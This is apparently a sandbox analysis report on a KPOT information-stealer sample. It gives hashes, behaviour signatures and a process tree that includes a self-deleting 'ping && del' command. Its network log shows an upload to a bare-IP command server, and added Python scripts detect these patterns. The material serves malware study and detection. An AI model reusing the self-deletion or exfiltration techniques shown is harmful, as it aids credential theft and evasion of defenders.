Analysis

  • max time kernel
    126s
  • max time network
    129s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    07/07/2020, 18:05 UTC

General

  • Target

    dc02167cff131c6e6c0a2801f1eb3b0c.exe

  • Size

    399KB

  • MD5

    dc02167cff131c6e6c0a2801f1eb3b0c

  • SHA1

    20d395af135774018632b34dd6987ebfe43db43d

  • SHA256

    dc68a0a13aa0a1bf5394dd04e59ef2916f0b31a964730a17b0ff4afeac5888dc

  • SHA512

    438864813274ec6a5a9350391994de17512d957eccd4ffb4d7113e15e69e3c5171d94eb90c0081ac05c1a616ffe53999fd5bc46dda242847b4dcd7eaa1837362

Malware Config

Signatures

  • KPOT

    KPOT is an information stealer that steals user data and account credentials.

  • KPOT Core Executable 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Program crash 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic note for this signature is "likely ransomware behaviour"; for a sample classified as the KPOT stealer above, drive enumeration is more consistent with locating files to harvest.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dc02167cff131c6e6c0a2801f1eb3b0c.exe
    "C:\Users\Admin\AppData\Local\Temp\dc02167cff131c6e6c0a2801f1eb3b0c.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      "C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:3708
    • C:\Windows\SysWOW64\regedit.exe
      "C:\Windows\System32\regedit.exe" \s C:\Windows\wotsuper.reg
      2⤵
      • Runs .reg file with regedit
      PID:2572
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1736
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1736 -s 3404
      2⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:416
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:496
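
The `cmd.exe /c ping 127.0.0.1 && del "...\wotsuper.exe"` child in the tree above is the standard self-deletion idiom: `ping` stalls the shell until the parent has exited, so the `del` on the parent's own image succeeds. The following is an added example, not part of the report or the sandbox's own detection logic, that flags this chain in process-creation telemetry. The event records are constructed to mirror the tree above (pid, parent pid, image, command line, the fields Sysmon Event ID 1 supplies); the explorer.exe parent, the benign `del C:\Temp\out.txt` line and the `find_self_delete` function are assumptions for illustration.

```python
import re

# Constructed process-creation events modelled on the tree in the report.
# Not sandbox output: the explorer.exe parent and the final benign cmd.exe
# line are invented so the detector has something to ignore.
EVENTS = [
    {"pid": 3832, "ppid": 1,
     "image": r"C:\Users\Admin\AppData\Local\Temp\dc02167cff131c6e6c0a2801f1eb3b0c.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\dc02167cff131c6e6c0a2801f1eb3b0c.exe"'},
    {"pid": 1528, "ppid": 3832,
     "image": r"C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe",
     "cmdline": r'"C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"'},
    {"pid": 1916, "ppid": 1528,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"'},
    {"pid": 3708, "ppid": 1916,
     "image": r"C:\Windows\SysWOW64\PING.EXE", "cmdline": "ping 127.0.0.1"},
    {"pid": 2572, "ppid": 3832,
     "image": r"C:\Windows\SysWOW64\regedit.exe",
     "cmdline": r'"C:\Windows\System32\regedit.exe" \s C:\Windows\wotsuper.reg'},
    {"pid": 4000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5000, "ppid": 4000,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c ping 10.0.0.1 && del C:\Temp\out.txt'},
]

# Target of a `del`/`erase`: optional switches, optional quotes, stops at the
# next command separator or end of line.
DEL_RE = re.compile(r'\b(?:del|erase)\b\s+(?:/[a-z]\s+)*"?([^"&|]+?)"?\s*(?:&|\||$)', re.I)
# Commands commonly used to stall until the parent exits.
DELAY_RE = re.compile(r"\b(?:ping|timeout|choice)\b", re.I)


def lineage(by_pid, pid, limit=8):
    """Return 'child <- parent <- ...' image basenames, bounded against cycles."""
    chain = []
    while pid in by_pid and len(chain) < limit:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1])
        pid = by_pid[pid]["ppid"]
    return " <- ".join(chain)


def find_self_delete(events):
    """Flag cmd.exe instances whose `del` target is their parent's own image."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        for m in DEL_RE.finditer(e["cmdline"]):
            target = m.group(1).strip().lower()
            if target == parent["image"].lower():
                hits.append({
                    "cmd_pid": e["pid"],
                    "parent_pid": parent["pid"],
                    "deleted": parent["image"],
                    "delayed": bool(DELAY_RE.search(e["cmdline"])),
                    "lineage": lineage(by_pid, e["pid"]),
                })
    return hits


if __name__ == "__main__":
    for hit in find_self_delete(EVENTS):
        print(hit)
```

Matching the deleted path against the parent's image, rather than alerting on every `ping && del`, is what keeps the benign cleanup line quiet; the `lineage` string gives the analyst the dropper chain (cmd.exe <- wotsuper.exe <- original sample) without a second query.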

Network

  • DNS
    iplogger.org
    Remote address:
    8.8.8.8:53
    Request
    iplogger.org
    IN A
    Response
    iplogger.org
    IN A
    88.99.66.31
  • GET
    http://89.249.67.27/bUjyAvgAIgcicUbB
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB HTTP/1.1
    Connection: Keep-Alive
    Host: 89.249.67.27
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:01 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 348
    Connection: keep-alive
    Location: http://89.249.67.27/bUjyAvgAIgcicUbB/
  • GET
    http://89.249.67.27/bUjyAvgAIgcicUbB/
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB/ HTTP/1.1
    Connection: Keep-Alive
    Host: 89.249.67.27
    Response
    HTTP/1.1 302 Found
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
    Set-Cookie: PHPSESSID=5oum76km3vlk2qosbce8r2fft2; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
  • GET
    http://89.249.67.27/bUjyAvgAIgcicUbB/login.php
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB/login.php HTTP/1.1
    Connection: Keep-Alive
    Host: 89.249.67.27
    Cookie: PHPSESSID=5oum76km3vlk2qosbce8r2fft2
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 231
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
  • GET
    http://89.249.67.27/bUjyAvgAIgcicUbB/util.php?id=BB751A70FD7F2148772887
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB/util.php?id=BB751A70FD7F2148772887 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 89.249.67.27
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:03 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4992
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
  • POST
    http://89.249.67.27/bUjyAvgAIgcicUbB/util.php
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    POST /bUjyAvgAIgcicUbB/util.php HTTP/1.1
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Host: 89.249.67.27
    Content-Length: 197781
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:09 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 2
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
  • GET
    http://www.msftconnecttest.com/connecttest.txt
    WerFault.exe
    Remote address:
    13.107.4.52:80
    Request
    GET /connecttest.txt HTTP/1.1
    Connection: Keep-Alive
    Host: www.msftconnecttest.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store
    Content-Length: 22
    Content-Type: text/plain; charset=utf-8
    Last-Modified: Thu, 02 Jul 2020 02:48:07 GMT
    Accept-Ranges: bytes
    ETag: 0x8D343F9E96C9DAC
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: X-MSEdge-Ref
    Timing-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-MSEdge-Ref: Ref A: BC3A8E309618491FAB24C5415A6208CB Ref B: AMSEDGE0911 Ref C: 2020-07-07T18:05:15Z
    Date: Tue, 07 Jul 2020 18:05:14 GMT
  • GET
    http://www.msftconnecttest.com/connecttest.txt
    WerFault.exe
    Remote address:
    13.107.4.52:80
    Request
    GET /connecttest.txt HTTP/1.1
    Connection: Keep-Alive
    Host: www.msftconnecttest.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store
    Content-Length: 22
    Content-Type: text/plain; charset=utf-8
    Last-Modified: Thu, 02 Jul 2020 02:48:07 GMT
    Accept-Ranges: bytes
    ETag: 0x8D343F9E96C9DAC
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: X-MSEdge-Ref
    Timing-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-MSEdge-Ref: Ref A: 7A0C6D686932476A85029AF756032DDA Ref B: AMSEDGE0911 Ref C: 2020-07-07T18:05:15Z
    Date: Tue, 07 Jul 2020 18:05:14 GMT
  • DNS
    watson.telemetry.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    watson.telemetry.microsoft.com
    IN A
    Response
    watson.telemetry.microsoft.com
    IN CNAME
    umwatson.trafficmanager.net
    umwatson.trafficmanager.net
    IN A
    52.184.221.185
  • POST
    https://watson.telemetry.microsoft.com/Telemetry.Request
    WerFault.exe
    Remote address:
    52.184.221.185:443
    Request
    POST /Telemetry.Request HTTP/1.1
    Connection: Keep-Alive
    User-Agent: MSDW
    MSA_DeviceTicket: t=…&p=
    AAD_TenantId: (null)
    Content-Length: 4700
    Host: watson.telemetry.microsoft.com
    Response
    HTTP/1.1 200 200 OK
    Content-Length: 1214
    Content-Type: text/xml
    Date: Tue, 07 Jul 2020 18:05:16 GMT
  • POST
    https://watson.telemetry.microsoft.com/Telemetry.Request
    WerFault.exe
    Remote address:
    52.184.221.185:443
    Request
    POST /Telemetry.Request HTTP/1.1
    Connection: Keep-Alive
    User-Agent: MSDW
    MSA_DeviceTicket: t=…&p=
    AAD_TenantId: (null)
    Content-Length: 502526
    Host: watson.telemetry.microsoft.com
    Response
    HTTP/1.1 200 200 OK
    Content-Length: 881
    Content-Type: text/xml
    Date: Tue, 07 Jul 2020 18:05:18 GMT
  • 89.249.67.27:80
    http://89.249.67.27/bUjyAvgAIgcicUbB/login.php
    http
    wotsuper.exe
    601 B
    1.8kB
    7
    7

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB

    HTTP Response

    301

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB/

    HTTP Response

    302

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB/login.php

    HTTP Response

    200
  • 89.249.67.27:80
    http://89.249.67.27/bUjyAvgAIgcicUbB/util.php
    http
    wotsuper.exe
    204.1kB
    10.9kB
    146
    137

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB/util.php?id=BB751A70FD7F2148772887

    HTTP Response

    200

    HTTP Request

    POST http://89.249.67.27/bUjyAvgAIgcicUbB/util.php

    HTTP Response

    200
  • 13.107.4.52:80
    http://www.msftconnecttest.com/connecttest.txt
    http
    WerFault.exe
    446 B
    1.2kB
    6
    5

    HTTP Request

    GET http://www.msftconnecttest.com/connecttest.txt

    HTTP Response

    200

    HTTP Request

    GET http://www.msftconnecttest.com/connecttest.txt

    HTTP Response

    200
  • 52.184.221.185:443
    https://watson.telemetry.microsoft.com/Telemetry.Request
    tls, http
    WerFault.exe
    6.8kB
    5.7kB
    12
    10

    HTTP Request

    POST https://watson.telemetry.microsoft.com/Telemetry.Request

    HTTP Response

    200
  • 52.184.221.185:443
    https://watson.telemetry.microsoft.com/Telemetry.Request
    tls, http
    WerFault.exe
    526.7kB
    14.4kB
    369
    183

    HTTP Request

    POST https://watson.telemetry.microsoft.com/Telemetry.Request

    HTTP Response

    200
  • 8.8.8.8:53
    iplogger.org
    dns
    58 B
    74 B
    1
    1

    DNS Request

    iplogger.org

    DNS Response

    88.99.66.31

  • 8.8.8.8:53
    watson.telemetry.microsoft.com
    dns
    76 B
    133 B
    1
    1

    DNS Request

    watson.telemetry.microsoft.com

    DNS Response

    52.184.221.185
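
The wotsuper.exe flows above give the shape of the check-in: a bare-IP host, a 16-character gate directory, a GET to util.php carrying a hex client id, then a 197,781-byte application/octet-stream POST to the same script (the harvested data leaving the host), while the WerFault.exe traffic to Microsoft is the crash-reporting noise a stealer crash produces. Below is an added example, not code from the report or the sandbox, that scores per-process HTTP activity for that combination so the C2 flow stands out from the telemetry. The transaction records are constructed from the flows above; the 50 kB upload threshold, the 12-character directory length, the 16-hex-digit id length and the three-reason cutoff are assumptions chosen for illustration, not KPOT-specific facts.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed transaction records mirroring the report's flows (process,
# method, URL, request headers, request body length). Not sandbox output.
TRANSACTIONS = [
    {"process": "wotsuper.exe", "method": "GET",
     "url": "http://89.249.67.27/bUjyAvgAIgcicUbB/login.php",
     "headers": {}, "content_length": 0},
    {"process": "wotsuper.exe", "method": "GET",
     "url": "http://89.249.67.27/bUjyAvgAIgcicUbB/util.php?id=BB751A70FD7F2148772887",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"}, "content_length": 0},
    {"process": "wotsuper.exe", "method": "POST",
     "url": "http://89.249.67.27/bUjyAvgAIgcicUbB/util.php",
     "headers": {"Content-Type": "application/octet-stream", "Content-Encoding": "binary"},
     "content_length": 197781},
    {"process": "WerFault.exe", "method": "GET",
     "url": "http://www.msftconnecttest.com/connecttest.txt",
     "headers": {}, "content_length": 0},
    {"process": "WerFault.exe", "method": "POST",
     "url": "https://watson.telemetry.microsoft.com/Telemetry.Request",
     "headers": {"User-Agent": "MSDW"}, "content_length": 502526},
]

HEX_ID_RE = re.compile(r"^[0-9A-Fa-f]{16,}$")    # assumed: client ids are long hex strings
GATE_DIR_RE = re.compile(r"^[A-Za-z0-9]{12,}$")  # assumed: random alphanumeric gate directory
UPLOAD_THRESHOLD = 50_000                         # assumed: request bodies this large count as bulk upload


def is_ip_literal(host):
    """True when the Host is an IPv4/IPv6 literal rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_c2(transactions, min_reasons=3):
    """Group transactions by (process, host) and report groups that show
    at least `min_reasons` of the check-in traits seen in the report."""
    groups = defaultdict(list)
    for t in transactions:
        u = urlsplit(t["url"])
        groups[(t["process"], u.hostname)].append((t, u))

    findings = []
    for (process, host), items in groups.items():
        reasons = []
        if host and is_ip_literal(host):
            reasons.append("host is a bare IP literal")
        # First path segment, only for URLs that actually have a directory level.
        top_dirs = {u.path.split("/")[1] for _, u in items if u.path.count("/") >= 2}
        if any(GATE_DIR_RE.match(d) for d in top_dirs):
            reasons.append("random-looking top-level directory")
        if any(t["method"] == "GET" and u.path.endswith(".php")
               and any(HEX_ID_RE.match(v) for v in parse_qs(u.query).get("id", []))
               for t, u in items):
            reasons.append("GET to .php with hex 'id' parameter")
        uploads = [t["content_length"] for t, _ in items
                   if t["method"] == "POST"
                   and t["headers"].get("Content-Type", "").startswith("application/octet-stream")
                   and t["content_length"] >= UPLOAD_THRESHOLD]
        if uploads:
            reasons.append(f"binary POST of {max(uploads)} bytes")
        if len(reasons) >= min_reasons:
            findings.append({"process": process, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in score_c2(TRANSACTIONS):
        print(finding["process"], finding["host"], "; ".join(finding["reasons"]))
```

The Watson POST is larger than the stealer's upload, which is why the scorer keys on the combination of traits rather than body size alone: a large POST to a named Microsoft host with a proper Content-Type collects no reasons, whereas the util.php exchange collects all four.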

MITRE ATT&CK Enterprise v6


Downloads

  • memory/416-10-0x000001E26B620000-0x000001E26B621000-memory.dmp

    Filesize

    4KB

  • memory/416-7-0x000001E26A5C0000-0x000001E26A5C1000-memory.dmp

    Filesize

    4KB

  • memory/416-8-0x000001E26A5C0000-0x000001E26A5C1000-memory.dmp

    Filesize

    4KB

  • memory/416-13-0x000001E26BA20000-0x000001E26BA21000-memory.dmp

    Filesize

    4KB

  • memory/416-15-0x000001E26B760000-0x000001E26B761000-memory.dmp

    Filesize

    4KB

  • memory/416-16-0x000001E26B560000-0x000001E26B561000-memory.dmp

    Filesize

    4KB

  • memory/416-21-0x000001E26B510000-0x000001E26B511000-memory.dmp

    Filesize

    4KB

  • memory/1528-4-0x0000000000600000-0x0000000000620000-memory.dmp

    Filesize

    128KB

  • memory/1528-6-0x00000000020C0000-0x00000000020DE000-memory.dmp

    Filesize

    120KB
